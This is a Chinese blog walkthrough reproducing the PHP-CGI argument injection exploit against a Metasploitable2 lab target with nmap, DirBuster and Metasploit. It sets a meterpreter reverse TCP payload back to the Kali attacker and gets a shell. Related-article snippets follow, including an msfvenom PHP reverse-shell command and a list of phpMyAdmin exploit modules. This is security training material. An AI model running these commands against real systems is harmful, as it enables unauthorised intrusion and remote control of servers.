Msf溢出phpMyAdmin

最新推荐文章于 2024-12-13 19:45:10 发布
最新推荐文章于 2024-12-13 19:45:10 发布
阅读量536 收藏 1
点赞数 1
分类专栏: 各种漏洞复现
原文链接:https://www.baidu.com/link?url=yXc4cjc2mYqdzOIcSRBgVkcqWjoQzv-94cGLOFr0wikoXuE73P44sO4YWhnczWs7&wd=&eqid=927f32da000188d6000000025f2e1cd1
版权

CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令

环境
kali linux 攻击机:ip 192.168.235.149
metasploitable2 目标机:ip 192.168.235.140

步骤

1、 确保目标机与攻击机能够ping通
在这里插入图片描述
2、 对目标主机进行端口扫描,使用nmap -sV -v 192.168.235.140
在这里插入图片描述
可以看到Apache服务的端口是开着的
3、 浏览器中输入地址192.168.235.140 访问目标主机
在这里插入图片描述
4、 终端中输入dirbuster 启动扫描软件进行扫描
在这里插入图片描述
在Target URL中输入目标主机地址:192.168.235.140 点击“Browse”按钮选择字典文件“/usr/share/dirbuster/wordlists/directory-list-1.0.txt”点击star 开始扫描
在这里插入图片描述
扫描结果显示
在这里插入图片描述
有PHPmyadmin和cgi的目录信息
5、 终端输入msfconsole 打开msf,msf终端中输入search php_cgi 搜索有关CGI php的攻击模块
在这里插入图片描述
6、 终端中输入use exploit/multi/http/php_cgi_arg_injection
Show options
在这里插入图片描述
7、 Show payload可以看到选项里有 payloads相关的攻击载荷模块
在这里插入图片描述
这里我们选择php/meterpreter/reverse_tcp
8、 这里利用meterpreter取得shell连接 set PAYLOAD php/meterpreter/reverse_tcp
在这里插入图片描述
9、 show options 查看有什么参数
在这里插入图片描述
这里我们设置源主机 LHOST 192.168.235.149 设置目标主机 RHOST 192.168.235.140
在这里插入图片描述
输入run开始攻击
在这里插入图片描述
拿到meterpreter
10、 终端中输入 sysinfo
在这里插入图片描述
可以看到相关的信息
看到etc下的配置文件
在这里插入图片描述
可以看到Apache服务器的信息

[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
msf php,Metasploit溢出phpMyAdmin漏洞
weixin_39817391的博客
03-09 274
利用phpMyAdmin漏洞上传***程序,获得webshell。CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程***者在请求参数中插入执行命令。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放80端口。1.3在浏览...
利用MSF溢出攻击讲解
weixin_34417814的博客
07-07 224
msf的强大之处也就不做探讨了,虽然这些东西网上很多。但我想说说我的感受。 这次的演示是在BT5中远程攻击一台win2003 sp2 metasploit是4.3的 需要说明的一点是 现在的BT5中不像BT4中有postgresql数据库 需要使用的须自行安装。 并且现在msf在4.0以后就没有了db_autopwn. 首先在BT5中打开msf. 创建数据库 ,加载db_autopw...
Web渗透小案例——利用MSF拿下phpmyadmin的windows服务器system权限并读取管理员密码
Mr_Wanderer的博客
08-08 2661
文章目录配置靶机新建低权限用户安装phpstudy为phpstudy相关服务分配权限设置mysql权限设置Apache权限设置apache和MySQLa服务更换phpmyadmin版本漏洞原理使用MSF进行漏洞利用打开msf爆破靶机密码利用phpmyadmin漏洞进行攻击建立稳定连接生成反向连接木马攻击机开启端口监听,等待靶机连接攻击机上传木马并运行提权获取管理员账号和密码加载mimikatz迁移进程写在最后亲测可行。如果本文有帮到您,求点赞留言~如果有任何疑问,请私信我 配置靶机 靶机操作系统选择wind
Metasploit溢出phpMyAdmin漏洞
weixin_33947521的博客
12-12 385
利用phpMyAdmin漏洞上传***程序,获得webshell。CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程***者在请求参数中插入执行命令。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端...
记【phpMyAdmin默认安装漏洞】
初学者L_言的博客
11-11 4166
一、工具 BrupSuit kali 靶机 Metasploitable2 只要是基于php-mysql 的服务器(靶机) 一般都可尝试去查看是否存在这个漏洞 二、 /setup 目录 mysql默认安装是会产生 /phpMyAdmin 这个目录, 而这个目录下有个 /setup 目录 这个目录可以在不登入的情况下访问,并对服务器的数据库进行配置 e.g. 基于安全考虑,一般服务器在配置好数据...
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
渗透测试完整流程
qq_45590470的博客
11-08 1365
渗透测试流程
oscp备考,oscp系列——Kioptix Level 1~5靶场详解,附重新使用VMware克隆的下载地址,VMware可以直接打开使用
最新发布
2202_75361164的博客
12-13 1364
oscp备考,oscp系列——Kioptix Level 1~5靶场详解,附重新使用VMware克隆的下载地址,VMware可以直接打开使用 下载地址: ``` https://pan.quark.cn/s/d290014bb3d8 ```
PhpMyAdmin漏洞利用总结with Metasploit
ncafei的博客
03-27 7047
一: 影响版本:3.5.x 概述:PhpMyAdmin存在PREG_REPLACE_EVAL漏洞 利用模块:exploit/multi/http/phpmyadmin_preg_replace CVE: CVE-2013-3238 二: 影响版本:phpMyAdmin v3.5.2.2 概述:PhpMyAdmin存在server_sync.PHP  后门漏洞 利用模块:explo
CVE-2018-12613 PhpMyadmin后台文件包含分析
大方子
07-28 1214
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞. 描述: 一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。 该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg ['AllowArbitraryServer'] = true:攻击者...
PHPmyadmin漏洞和拿shell
Hacker小梦
04-06 1万+
phpmyadmin的漏洞相对来说,还是比较多的,对于新手来说,分享几个漏洞,深入的处于代码审计方面的也可以和我讨论 phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使用‘localhost’@'@”为账号,密码不用输入。 phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆,密码不用 找这个的话 用自己的写的脚本,或者搜素引擎什么的,这
暴力破解+文件遍历(通过phpMyAdmin拿到shell)
Jiajiajiang_的博客
08-03 6094
公司测试地址:10.0.3.45 测试地址是内网,外网访问不了 这里暴力破解指目录暴破,对于phpMyAdmin来说,因为是弱口令这里就没有暴破,需要的话可以利用burp进行暴力破解 还有一款专门用于phpMyAdmin的破解工具,不做演示了 工具链接 链接:https://pan.baidu.com/s/1Bcdt4sMR1KDRNzj_-bG4-g 密码:rq83 今...
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9958
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
MSF 内网渗透(案例)
热门推荐
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
metasploit framework
小锤队长的博客
10-30 774
1,制作一个反弹shell,来执行服务的命令,并监听 (能在浏览器上直接访问的就制作php的,可以使用命令执行的建议使用 python型的) (制作python型的只需要把php改为python就可以了) msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.166 lport=4444 -f raw -p 指定使用模块 -f...
MSF中文版深度解析与应用
Microsoft解决方案框架(MSF)是一个微软推出的指导原则和实践集合,旨在帮助组织设计、实施和管理软件项目。MSF提供了一系列的最佳实践、原则、过程和模板,以指导项目管理、软件开发、团队协作和决策制定。 MSF的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值